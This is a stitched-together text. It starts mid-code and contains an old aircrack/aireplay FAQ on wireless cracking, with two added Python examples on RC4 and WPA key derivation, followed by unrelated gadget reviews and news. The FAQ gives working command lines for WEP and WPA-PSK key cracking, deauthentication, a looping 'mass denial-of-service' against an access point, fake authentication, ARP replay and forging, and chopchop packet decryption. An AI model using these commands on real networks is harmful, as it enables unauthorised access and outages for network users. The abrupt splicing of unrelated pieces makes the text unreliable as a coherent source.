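        print(f"{ap.bssid} ch{ap.channel:<2} {ap.phy:<8} {ap.enc:<4} "
              f"{audit([ap])[ap.bssid]:<12} stations={len(ap.stations)} {name}")
```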

How do I merge multiple capture files ?

You may use the mergecap program (part of the ethereal-common package or the win32 distribution):

mergecap -w out.cap test1.cap test2.cap test3.cap

.ivs files can be merged with the "mergeivs" program (linux only).

Can I use Ethereal to capture 802.11 packets ?

Under Linux, simply set up the card in monitor mode with the airmon.sh script. Under Windows, Ethereal can NOT capture 802.11 packets.

Can Ethereal decode WEP data packets ?

Yes. Go to Edit -> Preferences -> Protocols -> IEEE 802.11, select 1 in the "WEP key count" and enter your WEP key below.

How do I change my card's MAC address ?

Under Linux: for example, if you have an Atheros card:
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Under Windows, you may use macmakeup.

How do I use aircrack ?

Usage: aircrack [options]

You can specify multiple input files (either in .cap or .ivs format). Also, you can run both airodump and aircrack at the same time: aircrack will auto-update when new IVs are available.

Here's a summary of all available options:

Option  Param.  Description
-a      amode   Force attack mode (1 = static WEP, 2 = WPA-PSK).
-e      essid   If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA-PSK cracking if the ESSID is not broadcast (hidden).
-b      bssid   Select the target network based on the access point's MAC address.
-p      nbcpu   On SMP systems, set this option to the number of CPUs.
-q      none    Enable quiet mode (no status output until the key is found, or not).
-c      none    (WEP cracking) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F).
-t      none    (WEP cracking) Restrict the search space to binary coded decimal hex characters.
-d      start   (WEP cracking) Set the beginning of the WEP key (in hex), for debugging purposes.
-m      maddr   (WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all IVs, regardless of the network.
-n      nbits   (WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128.
-i      index   (WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.
-f      fudge   (WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success.
-k      korek   (WEP cracking) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.
-x      none    (WEP cracking) Enable bruteforcing of the last two keybytes.
-y      none    (WEP cracking) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs.
-w      words   (WPA cracking) Path to a wordlist.

Could you implement a resume option in aircrack ?

There are no plans to implement this feature.

How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay. Also, a good dictionary is required; see
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

FYI, it's not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.

Will WPA be cracked in the future ?

It's extremely unlikely that WPA will be cracked just like WEP was.

The major problem with WEP is that the shared key is appended to the IV; the result is directly used to feed RC4. This overly simple construction is prone to a statistical attack, since the first ciphertext bytes are strongly correlated with the shared key (see Andrew Roos' paper). There are basically two counter-measures against this attack: 1. mix the IV and the shared key using a hash function or 2. discard the first 256 bytes of RC4's output.

There has been some disinformation in the news about the "flaws" of TKIP:

For now, TKIP is reasonably secure but it is also living on borrowed time since it still relies on the same RC4 algorithm that WEP relied on.

Actually, TKIP (WPA1) is not vulnerable: for each packet, the 48-bit IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key, so there's no statistical correlation at all. Furthermore, WPA provides counter-measures against active attacks (traffic reinjection), includes a stronger message integrity code (Michael), and has a very robust authentication protocol (the 4-way handshake). The only vulnerability so far is a dictionary attack, which fails if the passphrase is robust enough.
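The difference between the WEP construction and a mixed per-packet key can be measured directly. The following is an added example, not code from aircrack or from the original FAQ: it counts how often one entry of RC4's initial state matches the value Roos' observation predicts from the raw IV and shared key. The SHA-256 mixing is an assumed stand-in for a hash-based mixing step (it is not TKIP's real key-mixing function), the function names are illustrative, and the sample key is the 104-bit key from the airdecap example on this page.

```python
import hashlib
import random


def rc4_ksa(key: bytes) -> list:
    """RC4 key-scheduling algorithm: return the 256-entry state after setup."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]
    return state


def roos_value(key: bytes, i: int) -> int:
    """Most likely value of state[i] after the KSA, per Roos:
    K[0] + ... + K[i] + i(i+1)/2 (mod 256)."""
    return (sum(key[: i + 1]) + i * (i + 1) // 2) & 0xFF


def wep_packet_key(iv: bytes, secret: bytes) -> bytes:
    """WEP: the RC4 key is the 3-byte IV followed by the shared key."""
    return iv + secret


def mixed_packet_key(iv: bytes, secret: bytes) -> bytes:
    """Counter-measure 1 from the text: hash IV and key together first.
    SHA-256 is an assumption made for this example only."""
    return hashlib.sha256(iv + secret).digest()[:16]


def correlation_rate(make_key, secret: bytes, samples: int = 2000, seed: int = 1) -> float:
    """Fraction of packets whose state[3] equals the value predicted from
    IV || secret. Index 3 is the first state entry that depends on a
    secret key byte when the IV occupies key bytes 0..2."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(samples):
        iv = bytes(rng.randrange(256) for _ in range(3))
        state = rc4_ksa(make_key(iv, secret))
        if state[3] == roos_value(iv + secret, 3):
            hits += 1
    return hits / samples


# 104-bit sample key taken from the airdecap example on this page.
SECRET = bytes.fromhex("11A3E229084349BC25D97E2939")

if __name__ == "__main__":
    print("chance level          : %.4f" % (1 / 256))
    print("IV || key (WEP)       : %.4f" % correlation_rate(wep_packet_key, SECRET))
    print("hash(IV || key) mixed : %.4f" % correlation_rate(mixed_packet_key, SECRET))
```

With the WEP construction the match rate sits far above the 1/256 chance level; with the mixed key it drops back to chance, which is the "no statistical correlation" property claimed for per-packet key mixing.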

WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5 for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1, but neither is going to be cracked in the near future.

I have more than one million IVs, but aircrack doesn't find the key !

Possible reasons:
  • Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one million IVs, but sometimes more IVs are needed.
  • If all votes seem equal, or if there are many negative votes, then the capture file is corrupted, or the key is not static (EAP/802.1X in use ?).
  • A false positive prevented the key from being found. Try to disable each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the experimental bruteforce attacks (-x / -y).

I've found the key, how do I decrypt a capture file ?

You may use the airdecap program:
  usage: airdecap [options] 

-l : don't remove the 802.11 header
-b bssid : access point MAC address filter
-k pmk : WPA Pairwise Master Key in hex
-e essid : target network ascii identifier
-p pass : target network WPA passphrase
-w key : target network WEP key in hex

examples:

airdecap -b 00:09:5B:10:BC:5A open-network.cap
airdecap -w 11A3E229084349BC25D97E2939 wep.cap
airdecap -e 'the ssid' -p passphrase tkip.cap

How do I recover my WEP key in Windows ?

You may use the WZCOOK program which recovers WEP keys from XP's Wireless Zero Configuration utility. This is experimental software, so it may or may not work depending on your service pack level.

Does WZCOOK also recover WPA keys ?

WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is the result of the passphrase hashed 8192 times together with the ESSID and the ESSID length. The passphrase itself can't be recovered -- however, knowing the PMK is enough to connect to a WPA-protected wireless network with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf configuration file should look like:

network={
ssid="my_essid"
pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
}
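The PMK derivation described in this answer, and the ESSID salting mentioned in the WPA-PSK answer earlier, as an added example (not part of the original FAQ, aircrack or WZCOOK). WPA-PSK derives the PMK with PBKDF2-HMAC-SHA1 using the ESSID as salt, 4096 iterations and 32 bytes of output; 32 bytes need two SHA-1-sized blocks, which is where the 8192 hash rounds come from. Function names are illustrative.

```python
import hashlib
import hmac
import struct


def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2-PSK Pairwise Master Key."""
    pw = passphrase.encode("ascii")
    salt = essid.encode("utf-8")
    if not 8 <= len(pw) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    if not 1 <= len(salt) <= 32:
        raise ValueError("ESSID must be 1 to 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", pw, salt, 4096, 32)


def pbkdf2_counted(pw: bytes, salt: bytes, iterations: int = 4096, length: int = 32):
    """Hand-rolled PBKDF2-HMAC-SHA1 that also returns the number of
    HMAC evaluations performed, to make the work factor visible."""
    calls = 0
    out = b""
    block = 1
    while len(out) < length:
        # First round of each block covers salt || big-endian block index.
        u = hmac.new(pw, salt + struct.pack(">I", block), hashlib.sha1).digest()
        calls += 1
        acc = int.from_bytes(u, "big")
        for _ in range(iterations - 1):
            u = hmac.new(pw, u, hashlib.sha1).digest()
            calls += 1
            acc ^= int.from_bytes(u, "big")
        out += acc.to_bytes(20, "big")
        block += 1
    return out[:length], calls


if __name__ == "__main__":
    # Passphrase/ESSID pair from the published 802.11i test vectors.
    print("PMK for 'password' on 'IEEE'   :", wpa_pmk("password", "IEEE").hex())
    # Same passphrase, different ESSID: the salt changes the whole PMK,
    # so a table built for one network name is useless for another.
    print("PMK for 'password' on 'NETGEAR':", wpa_pmk("password", "NETGEAR").hex())
    _, calls = pbkdf2_counted(b"password", b"IEEE")
    print("HMAC-SHA1 evaluations          :", calls)
```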

How do I patch the driver for injection with aireplay ?

As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC), Atheros, RTL8180 and Ralink. Injection on Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell and Broadcom is not supported because of firmware and/or driver limitations.

Injection on Prism2 and Atheros is still pretty much experimental; if your card appears to hang (no packets captured or injected), disable the interface, reload the drivers and re-insert the card. Also consider updating the firmware (if Prism2).

All drivers must be patched so as to support injection in Monitor mode. You will need linux headers that match your current running kernel; if not, you will have to download the linux source and compile a custom kernel.

If you have trouble patching and compiling stuff, you may want to use the Troppix LiveCD, which includes patched device drivers.

  • Installing the madwifi driver (Atheros cards)

    Note 1: you'll need uudecode from the sharutils package.

    Note 2: the 20051025 patch should also work with newer versions of the madwifi CVS.

    Note 3: if you use wpa_supplicant, you should recompile it (older versions are not compatible with the current madwifi CVS), and make sure CONFIG_DRIVER_MADWIFI=y is uncommented in config.h.

    Note 4: with the current madwifi, it is no longer needed to run "iwpriv ath0 mode 2", since the driver allows injection in mode 0 using the new athXraw interface.

    Allowed modes   Physical medium
    Mode 0          Automatic (a/b/g)
    Mode 1          802.11a only
    Mode 2          802.11b only
    Mode 3          802.11g only

    ifconfig ath0 down
    rmmod wlan_wep ath_rate_sample ath_rate_onoe \
    ath_pci wlan ath_hal 2>/dev/null

    find /lib/modules -name 'ath*' -exec rm -v {} \; 2>/dev/null
    find /lib/modules -name 'wlan*' -exec rm -v {} \; 2>/dev/null
    cd /usr/src
    wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20051025.tgz
    wget http://100h.org/wlan/linux/patches/madwifi-cvs-20051025.patch
    tar -xvzf madwifi-cvs-20051025.tgz
    cd madwifi-cvs-20051025
    patch -Np1 -i ../madwifi-cvs-20051025.patch
    make KERNELPATH=/usr/src/linux-
    make install
    modprobe ath_pci

    It is now possible to set the transmit rate with madwifi (and also rt2570). The recommended rate is 5.5 Mbps, but you can lower it or raise it, depending on your distance from the AP. For example:

    iwconfig ath0 rate 24M

    Modulation    Allowed rates
    DSSS / CCK    1M, 2M, 5.5M, 11M
    OFDM (a/g)    6M, 9M, 12M, 24M, 36M, 48M, 54M

    When using attacks 2, 3 and 4, changing the number of packets per second sent by aireplay (option -x) sometimes helps getting better results; the default is 500 pps.

  • Installing the prism54 driver (PrismGT FullMAC cards)
    ifconfig eth1 down
    rmmod prism54

    cd /usr/src
    wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz
    wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch
    tar -xvzf prism54-svn-20050724.tgz
    cd prism54-svn-20050724
    patch -Np1 -i ../prism54-svn-20050724.patch
    make modules && make install
    wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
    mkdir -p /usr/lib/hotplug/firmware
    mkdir -p /lib/firmware
    cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
    mv 1.0.4.3.arm /lib/firmware/isl3890
    depmod -a
  • Installing the HostAP driver (Prism2 cards)
    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
    /etc/init.d/CardBus stop
    rmmod prism2_pci
    rmmod hostap_pci

    cd /usr/src
    wget http://100h.org/wlan/linux/prism2/hostap-driver-0.4.5.tar.gz
    wget http://100h.org/wlan/linux/patches/hostap-driver-0.3.9.patch
    tar -xvzf hostap-driver-0.4.5.tar.gz
    cd hostap-driver-0.4.5
    patch -Np1 -i ../hostap-driver-0.3.9.patch
    make && make install
    mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
    /etc/init.d/pcmcia start
    modprobe hostap_pci &>/dev/null
  • Installing the wlan-ng driver (Prism2 cards)

    Important note: when the card is inserted, wlan-ng will flash the firmware in RAM (volatile download) with versions PRI 1.1.4 and STA 1.8.3. Many users experienced problems with this operation, so in any case it's safer to just use hostap instead. Furthermore, HostAP works more reliably and supports iwconfig whereas wlan-ng doesn't.

    ifconfig wlan0 down
    wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
    /etc/init.d/pcmcia stop
    rmmod prism2_pci
    rmmod hostap_pci
    find /lib/modules \( -name 'p80211*' -o -name 'prism2*' \) \
    -exec rm -v {} \;

    cd /usr/src
    wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gz
    wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
    tar -xvzf wlanng-0.2.1-pre26.tar.gz
    cd wlanng-0.2.1-pre26
    patch -Np1 -i ../wlanng-0.2.1-pre26.patch
    make config && make all && make install
    mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
    /etc/init.d/pcmcia start
    modprobe prism2_pci &>/dev/null
  • Installing the r8180-sa2400 driver (RTL8180 cards)
    ifconfig wlan0 down
    rmmod r8180

    cd /usr/src
    wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
    wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
    tar -xvzf rtl8180-0.21.tar.gz
    cd rtl8180-0.21
    patch -Np1 -i ../rtl8180-0.21.patch
    make && make install
    depmod -a
    modprobe r8180
  • Installing the rt2500 driver (Ralink b/g PCI/CardBus)
    ifconfig ra0 down
    rmmod rt2500

    cd /usr/src
    wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20051112.tgz
    tar -xvzf rt2500-cvs-20051112.tgz
    cd rt2500-cvs-20051112
    cd Module
    make && make install
    modprobe rt2500

    Make sure to load the driver with modprobe (not insmod) and to put the card in Monitor mode before bringing the interface up.

  • Installing the rt2570 driver (Ralink b/g USB)
    ifconfig rausb0 down
    rmmod rt2570

    cd /usr/src
    wget http://100h.org/wlan/linux/ralink/rt2570-cvs-20051112.tgz
    tar -xvzf rt2570-cvs-20051112.tgz
    cd rt2570-cvs-20051112
    cd Module
    make && make install
    modprobe rt2570

The driver won't compile.

This usually happens because the linux headers don't match your current running kernel. In this situation, just recompile a fresh kernel, install it and reboot. Then, try again compiling the driver.

See this HOWTO for more details about kernel compilation.

How do I use aireplay ?

If the driver was properly patched, aireplay is able to inject raw 802.11 packets in Monitor mode; it currently implements a set of five different attacks.

If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that your device name is correct and that you haven't forgotten a parameter on the command line.

In the following examples, 00:13:10:30:24:9C is the MAC address of the access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a wireless client.

  • Attack 0: deauthentication

    This attack is mostly useful to recover a hidden (not broadcast) ESSID and for capturing WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows clients sometimes flush their ARP cache when disconnected. Of course, this attack is totally useless if there are no associated wireless clients.

    It is usually more effective to target a specific station using the -c parameter.

    Some examples:

    • WPA Handshake capture with an Atheros
      airmon.sh start ath0
      airodump ath0 out 6 (switch to another console)
      aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
      (wait for a few seconds)
      aircrack -w /path/to/dictionary out.cap
    • ARP request generation with a Prism2 card
      airmon.sh start wlan0
      airodump wlan0 out 6 (switch to another console)
      aireplay -0 10 -a 00:13:10:30:24:9C wlan0
      aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

      After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

      If the driver is wlan-ng, you must run the airmon.sh script; otherwise the card won't be correctly set up for injection.

    • Mass denial-of-service with a RT2500 card
      airmon.sh start ra0
      aireplay -0 0 -a 00:13:10:30:24:9C ra0

      With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected.

  • Attack 1: fake authentication

    This attack is only useful when you need an associated MAC address in attacks 2, 3, 4 (-h option) and there is currently no associated client. However it is generally better to use the MAC address of a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT generate ARP requests.

    Also, subsequent attacks will likely perform better if you update the MAC address of the card, so that it properly sends ACKs:

    ifconfig ath0 down
    ifconfig ath0 hw ether 00:11:22:33:44:55
    ifconfig ath0 up

    aireplay -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    12:14:06 Sending Authentication Request
    12:14:06 Authentication successful
    12:14:06 Sending Association Request
    12:14:07 Association successful :-)

    With patched madwifi CVS 2005-08-14, it's possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:

    ifconfig ath0 down hw ether 00:11:22:33:44:55
    iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
    ifconfig ath0 up

    sysctl -w dev.ath0.rawdev=1
    ifconfig ath0raw up
    airodump ath0raw out 6

    Then you can run attack 3 or 4 (aireplay will automatically replace ath0 with ath0raw below):

    aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
    aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

    Some access points require reassociation every 30 seconds, otherwise our fake client is considered disconnected. In this case, set up the periodic re-association delay:

    aireplay -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

    If this attack seems to fail (aireplay keeps sending authentication requests), MAC address filtering may be in place. Also make sure that:

    • You are close enough to the access point.
    • The driver is properly patched and installed.
    • The card is configured on the same channel as the AP.
    • The BSSID and ESSID (-a / -e options) are correct.
    • If Prism2, make sure the firmware was updated.

    As a reminder: you can't inject with a Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell or Broadcom chipset because of firmware and/or driver limitations.

  • Attack 2: interactive packet replay

    This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 (automatic ARP reinjection).

    You could use it, for example, to attempt the "any data re-broadcast" attack, which only works if the AP actually reencrypts WEP data packets:

    aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
    -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

    You can also use attack 2 to manually replay WEP-encrypted ARP request packets, whose size is either 68 or 86 bytes (depending on the operating system):

    aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
    -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

    aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
    -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
  • Attack 3: ARP-request reinjection

    The classic ARP-request replay attack is the most effective to generate new IVs, and works very reliably. You need either the MAC address of an associated client (00:09:5B:EB:C5:2B), or a fake MAC from attack 1 (00:11:22:33:44:55). You may have to wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will fail if there is no traffic.

    Please note that you can also reuse ARP requests from a previous capture using the -r switch.

    aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
    Saving ARP requests in replay_arp-0627-121526.cap
    You must also start airodump to capture replies.
    Read 2493 packets (got 1 ARP requests), sent 1305 packets...
  • Attack 4: KoreK's "chopchop" (CRC prediction)

    This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes. This attack requires at least one WEP data packet.

    1. First, we decrypt one packet :
      aireplay -4 -h 00:09:5B:EB:C5:2B ath0
    2. Let's have a look at the IP address :
      tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
      reading from file replay_dec-0627-022301.cap, link-type [...]
      IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
    3. Then, forge an ARP request.

      The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station.

      ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
      00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
    4. And replay our forged ARP request :
      aireplay -2 -r arp.cap ath0

0 Amkette FlashLink Review


Amkette FlashLink
What do you do when you have to transfer chunks of data from your desktop to your laptop/netbook or from your laptop to a netbook? Wi-Fi sharing would do, but what if you do not have Internet on both the devices - LAN or probably Bluetooth, but that is so slow that you just might decide not to go ahead. You can use Amkette FlashLink, a device that looks like a pen drive with a micro USB slot on one end. Once FlashLink is connected to one of the devices, the inbuilt software asks you to run the AFLloader on both the devices that are connected using a USB cable. And this happens every time the devices are connected. And once that is done, the Amkette FlashLink suite opens up with 5 options: Go! Finder, Go! Bridge, Remote Share, Folder Sync and Outlook Sync.
Go Finder is basically the name for the storage part of the device, that is 192MB. Go! Bridge allows the devices to access each other's hard drives and copy content from each other or delete documents from each other. One can view pictures, videos and play music directly from the connected device as well. While I tried to view some videos and hear some songs from the other device, there was no stutter both in terms of music or video, which is pretty good. I loved folder sync and like the fact that I would not have to use the hard drive twice and use twice the time to transfer content from my desktop to my notebook and vice-versa.
Bottomline: FlashLink from Amkette is a very good device that makes syncing and content transfer easy. Also, the price makes it a sensible buy too.

0 ASUS TO LAUNCH ALMOST SIX TABLETS IN THE COMING MONTHS

Asus has been working on multiple tablet devices for a while and now Digitimes reports that as many as 6 tablets are in the pipeline. The site says that it obtained the information from Asus President Jerry Shen. That said, these are still rumors and Digitimes has a history of presenting rumors as fact.

So here is what we know at the moment, assuming that Digitimes has got its sources correct. The upcoming Asus tablets will have screen sizes ranging from 7 to 12 inches. First of the six machines will hit the streets in December. The remaining five will make their debut by March.

Some of these tablets will have ARM-based processors and run Google Android or Windows Embedded 7. Others will have x86 based processors and run Windows.
There will be two 7 inch models. One of them will have WiFi and the other will have 3G and phone capabilities. Both of these machines are likely to have ARM-based processors.

There will be two models in the 9 inch space. One of them will have a NVIDIA Tegra 2 processor and run Google Android. The other model will have an Intel x86 processor and run Windows. There is no word on final pricing, but the Tegra based tablet is expected to be around $100 cheaper than the Windows tablet.

Aside from the 7 and 9 inch models, Asus is also developing 10 and 12 inch tablets.

0 ASUS N53SV-A1 MULTIMEDIA NOTEBOOK

The 15.6 inch Asus N53SV-A1 multimedia notebook has started shipping in the US. The N53SV-A1 is the first notebook in the Asus N series to sport Intel's 2nd generation Core 'Sandy Bridge' processors.

Precisely, the notebook has an Intel Core i7-2630QM quad-core processor, GeForce GT 540M 1GB discrete graphics, 4GB of RAM, a 750GB hard drive, DVD burner and a silver aluminum finish. The 15.6 inch display has a resolution of 1366 x 768 pixels.

The N53SV-A1 runs Windows 7 Home Premium operating system. It also has a 2 megapixel webcam, microphone, Altec Lansing stereo speakers, 1 USB 3.0 port, 2 USB 2.0 ports, 1 eSATA port, HDMI, VGA and a 5-in-1 media card reader. The laptop weighs 6.4 pounds with the standard 6-cell battery.

The Asus N53SV-A1 can be purchased from SuperBiiz for $1,170.96.